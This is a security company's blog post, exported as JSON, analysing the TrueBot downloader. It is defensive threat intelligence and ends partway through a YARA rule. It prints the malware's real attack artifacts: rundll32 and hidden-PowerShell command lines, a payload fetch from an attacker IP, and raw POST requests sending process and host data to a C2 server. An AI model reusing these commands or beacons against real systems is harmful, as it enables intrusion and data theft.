{"id":6991,"date":"2023-09-18T09:51:41","date_gmt":"2023-09-18T09:51:41","guid":{"rendered":"https:\/\/fortgale.com\/blog\/?p=6991"},"modified":"2023-09-22T08:01:53","modified_gmt":"2023-09-22T08:01:53","slug":"truebot-malware-analysis-16-06-2023","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/malware-analysis\/truebot-malware-analysis-16-06-2023\/","title":{"rendered":"TrueBot Malware Analysis (16-06-2023)"},"content":{"rendered":"After recent online publications regarding the <strong>TrueBot malware<\/strong> (<a href=\"https:\/\/blogs.vmware.com\/security\/2023\/06\/carbon-blacks-truebot-detection.html\" target=\"_blank\" rel=\"noreferrer noopener\">VMware<\/a>, <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/clop-ransomware-uses-truebot-malware-for-access-to-networks\/\">Bleeping<\/a> and <a href=\"https:\/\/thehackernews.com\/2023\/06\/alarming-surge-in-truebot-activity.html\" target=\"_blank\" rel=\"noreferrer noopener\">THN<\/a>), we have decided to contributing with our analysis of this potential new threat. At the end, you will find the indicators of compromise and a Yara rule to identify it.\n\n<!-- \/wp:post-content -->\n\n<!-- wp:paragraph -->\n\nBefore starting with the technical analysis of the malware, we believe it is useful to highlight some of its features:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It is a <strong><em>downloader<\/em><\/strong> type malware, used in the early stages of compromise.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It has used the Raspberry Robin worm as an attack vector.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It has been associated with at least two different Ransomware (<a href=\"https:\/\/www.cisa.gov\/news-events\/cybersecurity-advisories\/aa23-158a\" target=\"_blank\" rel=\"noreferrer noopener\">Cl0p<\/a> and <a href=\"https:\/\/malpedia.caad.fkie.fraunhofer.de\/actor\/evil_corp\" target=\"_blank\" rel=\"noreferrer noopener\">EvilCorp<\/a>).<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It is the evolution of the Silent.Dropper malware.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It is a tool used by the criminal actor known as <a href=\"https:\/\/fortgale.com\/threats\/threat-actor\/silence\/\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Silence<\/strong><\/a>.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:paragraph -->\n\nThe following is the general scheme of compromise:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"id\":6548,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"587\" class=\"wp-image-6548\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain-1024x587.png\" alt=\"\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain-1024x587.png 1024w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain-300x172.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain-768x440.png 768w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain.png 1051w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n<p style=\"text-align: center\">For more information on how to defend yourself: <a href=\"https:\/\/fortgale.com\" target=\"_blank\" rel=\"noreferrer noopener\">fortgale.com<\/a><\/p>\n<!-- \/wp:paragraph -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":1} -->\n<h1 id=\"h-analisi-tecnica\" class=\"wp-block-heading has-text-align-center\">Technical analysis<\/h1>\n<!-- \/wp:heading -->\n\n<!-- wp:spacer {\"height\":\"60px\"} -->\n<div class=\"wp-block-spacer\" style=\"height: 60px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading -->\n<h2 id=\"h-stage-1-javascript\" class=\"wp-block-heading\">Stage 1 &#8211; JavaScript<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:paragraph -->\n\nOur analysis begins with the identification of a JavaScript <em>file<\/em>, presumably inserted as an attachment to a malicious email. From intelligence activities, it was possible to recover the file named <strong>information_7_apr-4753978.js<\/strong>. The content of the <em>script<\/em> is obfuscated, in order to make analysis activities more complex:\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6435,\"width\":438,\"height\":502,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nAfter a deep cleaning of the code, the only noteworthy command emerges as:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6436,\"width\":929,\"height\":44,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6436\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-3.png\" alt=\"\" width=\"929\" height=\"44\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-3.png 979w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-3-300x14.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-3-768x37.png 768w\" sizes=\"(max-width: 929px) 100vw, 929px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nThe content, encoded in <em>Base64<\/em>, is represented here in its de-obfuscated form:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6437,\"width\":545,\"height\":114,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6437\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-4.png\" alt=\"\" width=\"545\" height=\"114\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-4.png 845w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-4-300x64.png 300w\" sizes=\"(max-width: 545px) 100vw, 545px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nIt is a PowerShell command that executes the file &#8220;<em><strong>dll.png<\/strong><\/em>&#8220;, fetched from the address <strong><code>62[.]204[.]41[.]69<\/code><\/strong>. The format of the file does not appear to be an image type (PNG) or attributable to a <em>dll<\/em>. In reality, it is a PowerShell script encoded inside a text file:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6438,\"width\":578,\"height\":280,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6438\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-5.png\" alt=\"\" width=\"578\" height=\"280\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-5.png 895w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-5-300x145.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-5-768x372.png 768w\" sizes=\"(max-width: 578px) 100vw, 578px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading -->\n<h2 id=\"h-stage2-dll\" class=\"wp-block-heading\">Stage2 &#8211; DLL<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:paragraph -->\n\nThe script, once executed, starts the download of a <em>dynamic library<\/em> (<strong><code>ldn.dll<\/code><\/strong>) from the address <strong><code>62[.]204[.]41[.]69<\/code><\/strong> and saves it in the path <strong><code>$env:APPDATA\\ <\/code><\/strong>with name<strong><code> NoSleep.dll<\/code><\/strong>.\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6439,\"width\":600,\"height\":243,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6439\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-6.png\" alt=\"\" width=\"600\" height=\"243\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-6.png 871w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-6-300x122.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-6-768x311.png 768w\" sizes=\"(max-width: 600px) 100vw, 600px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nThis is then loaded into memory via the command\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>cmd \/c rundll32 %APPDATA%\\NoSleep.dll,ChkdskExs<\/code><\/pre>\n<!-- \/wp:code -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading -->\n<h2 id=\"h-stage3-c-c\" class=\"wp-block-heading\">Stage3 &#8211; C&amp;C<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:paragraph -->\n\nThe library <code><strong>NoSleep.dll<\/strong><\/code>, signed with a Sectigo certificate, is none other than the <strong><em>TrueBot<\/em><\/strong> malware:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6440,\"width\":600,\"height\":254,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6440\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-7.png\" alt=\"\" width=\"600\" height=\"254\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-7.png 979w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-7-300x127.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-7-768x326.png 768w\" sizes=\"(max-width: 600px) 100vw, 600px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nThanks to reverse engineering and dynamic analysis, it was possible to reconstruct its entire behavior.\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\n\nThe first identified activities are related to assigning a unique identifier to the infected machine. This is achieved by creating the file <code><strong>C:\\ProgramData\\&lt;GUI&gt;.JSONIP<\/strong><\/code> and a <em>mutex<\/em> with the name <strong><code>(u3qkfewi3ujrk32lqpti32ofwq<\/code><\/strong>)\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6441,\"width\":754,\"height\":32,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6441\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-8.png\" alt=\"\" width=\"754\" height=\"32\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-8.png 979w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-8-300x13.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-8-768x34.png 768w\" sizes=\"(max-width: 754px) 100vw, 754px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nSubsequently, the malware proceeds to create two scheduled tasks to ensure persistence in the system:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li><strong>MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6AF2B031A266}<\/strong><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li><strong>MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6AF2B031A266}<\/strong><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n\nBoth tasks are assigned to execute the same command every ten minutes:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>cmd \/c C:\\Windows\\SysWOW64\\rundll32.exe \/S &lt;PathDll&gt;\\NoSleep.dll,ChkdskExs<\/code><\/pre>\n<!-- \/wp:code -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6444,\"width\":529,\"height\":188,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure><\/figure>\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6444\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-10.png\" alt=\"\" width=\"529\" height=\"188\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-10.png 802w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-10-300x107.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-10-768x273.png 768w\" sizes=\"(max-width: 529px) 100vw, 529px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6445,\"width\":408,\"height\":336,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6445\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-11.png\" alt=\"\" width=\"408\" height=\"336\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-11.png 671w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-11-300x247.png 300w\" sizes=\"(max-width: 408px) 100vw, 408px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nAt this point, a list of executables associated with active processes is created, excluding system services.\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\n\nFinally, this list is sent in <strong><em>URLEncode + Base64<\/em><\/strong> format to the Command and Control server via a <strong>POST<\/strong> to the URL <strong><code>hxxp:\/\/droogggdhfhf[.]com\/gate.php<\/code><\/strong>.\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:code {\"style\":{\"color\":{\"background\":\"#ffffff00\"}},\"textColor\":\"black\"} -->\n<pre class=\"wp-block-code has-black-color has-text-color has-background\" style=\"background-color: #ffffff00\"><code>POST \/gate.php HTTP\/1.0\nHost: droogggdhfhf.com\nContent-type: application\/x-www-form-urlencoded\nContent-length: 778\n\nq=biUzZDdiNTMwMzRjLTdiNTI3ZTAwJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJTI2bCUzZE9mZmljZUNsaWNrVG9SdW4uZXhlJTdjZXhwbG9yZXIuZXhlJTdjU2VhcmNoSW5kZXhlci5leGUlN2NTZWN1cml0eUhlYWx0aFN5c3RyYXkuZXhlJTdjVkJveFRyYXkuZXhlJTdjamF2YXcuZXhlJTdjU2dybUJyb2tlci5leGUlN2NwZXN0dWRpby5leGUlN2NkZWNvbXBpbGUuZXhlJTdjQXBwbGljYXRpb25GcmFtZUhvc3QuZXhlJTdjV2luZG93c1Rlcm1pbmFsLmV4ZSU3Y09wZW5Db25zb2xlLmV4ZSU3Y3Bvd2Vyc2hlbGwuZXhlJTdjeDY0ZGJnLmV4ZSU3Y21zZWRnZS5leGUlN2Ntc2VkZ2UuZXhlJTdjbXNlZGdlLmV4ZSU3Y21zZWRnZS5leGUlN2Ntc2VkZ2UuZXhlJTdjbXNlZGdlLmV4ZSU3Y21zZWRnZS5leGUlN2NNb1Vzb0NvcmVXb3JrZXIuZXhlJTdjc21hcnRzY3JlZW4uZXhlJTdjZGFzSG9zdC5leGUlN2NzcHBzdmMuZXhlJTdjV21pUHJ2U0UuZXhlJTdjZmFrZW5ldC5leGUlN2NmYWtlbmV0LmV4ZSU3Y1dtaUFwU3J2LmV4ZSU3Y1dtaVBydlNFLmV4ZSU3Y1dtaVBydlNFLmV4ZSU3Yw==<\/code><\/pre>\n<!-- \/wp:code -->\n\n<!-- wp:paragraph -->\nAt each iteration of the task, general information relating to the infected system is forwarded to the server, also signaling the availability to receive further instructions to process.\n<!-- \/wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>POST \/gate.php HTTP\/1.0\nHost: droogggdhfhf.com\nContent-type: application\/x-www-form-urlencoded\nContent-length: 180\n\nbiUzZDdiNTMwMzRjLTdiNTI3ZTAwJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJTI2byUzZFdJTjEwJTI2YSUzZDY0JTI2dSUzZFdPUktHUk9VUCUyNnAlM2RERVNLVE9QLTE3MjE2MFMlMjZkJTNk<\/code><\/pre>\n<!-- \/wp:code -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 id=\"capability-analysis\" class=\"wp-block-heading has-text-align-center\">Capability Analysis<\/h2>\n<!-- \/wp:heading -->\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:paragraph -->\nThe main purpose of the malware is to send information about active processes in the system to the C2 server and execute the commands returned by the server.\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\n\nWhen compared to other malware of the same type, the set of operations that TrueBot can perform is extremely limited:\n<!-- \/wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\">\n<table>\n<tbody>\n<tr>\n<td><strong>Command<\/strong><\/td>\n<td><strong>Effect<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>KLLS<\/strong><\/td>\n<td>Delete DLL and end process.<\/td>\n<\/tr>\n<tr>\n<td><strong>404NO<\/strong><\/td>\n<td>Empty command.<\/td>\n<\/tr>\n<tr>\n<td><strong>http<\/strong><\/td>\n<td><em>Not identified.<\/em> Parses values separated by &#8220;|&#8221; o &#8220;\/&#8221;.<\/td>\n<\/tr>\n<tr>\n<td><strong>PS1<\/strong><\/td>\n<td>Download a PowerShell script with path <strong>C:\\ProgramData\\&lt;GUID&gt;.ps1<\/strong> and executes it via the command <strong>wmic.exe process call create \\&#8221;powershell -executionpolicy bypass -nop -w hidden &lt;file ps1&gt;\\&#8221;<\/strong>.<\/td>\n<\/tr>\n<tr>\n<td><strong>SHC<\/strong><\/td>\n<td>Download and execute a <em>shellcode, <\/em>injecting it into a new process cmd.exe.<\/td>\n<\/tr>\n<tr>\n<td><strong>S64<\/strong><\/td>\n<td>Download and execute a <em>shellcode, <\/em>injecting it into a new process cmd.exe.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<!-- \/wp:table -->\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 id=\"h-riepilogo\" class=\"wp-block-heading has-text-align-center\">Riepilogo<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:paragraph -->\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\nTrueBot is a <em>downloader<\/em> malware, and as such it is mainly used by an operator to convey other malicious software (e.g. <em><strong>CobaltStrike<\/strong><\/em>).\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\nIt is clear that it was designed to complete generic tasks. In fact, there are no advanced commands usually used by an attacker to carry out advanced compromise activities.\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6434,\"width\":547,\"height\":228,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6434\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-1.png\" alt=\"\" width=\"547\" height=\"228\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-1.png 802w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-1-300x125.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-1-768x320.png 768w\" sizes=\"(max-width: 547px) 100vw, 547px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 id=\"h-regole-yara\" class=\"wp-block-heading has-text-align-center\">YARA Rule<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:paragraph -->\nOur malware analysis team has developed the following <em><strong>Yara<\/strong><\/em> rule:\n<!-- \/wp:paragraph -->\n\n<!-- wp:html -->\n<div style=\"font-family: monospace;padding: 1.0pt 4.0pt 1.0pt 4.0pt;background: whitesmoke\">\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span style=\"font-size: 10.5pt;color: #7a3e9d\">rule<\/span> <b><span style=\"font-size: 10.5pt;color: #aa3731\">TrueBotRule<\/span><\/b> <span style=\"font-size: 10.5pt;color: #777777\">{<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0<\/span><span style=\"font-size: 10.5pt;color: #4b69c6\">meta<\/span><span style=\"font-size: 10.5pt;color: #333333\">:<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0Author <\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span> <span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">Fortgale<\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0Summary <\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span> <span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">TrueBot Yara Rule<\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0<\/span><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">strings<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">:<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">possible_function_name<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">ChkdskExs<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">parameters_mapping<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">n=%s&amp;o=%s&amp;a=%d&amp;u=%s&amp;p=%s&amp;d=%s<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">ps1_path<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: 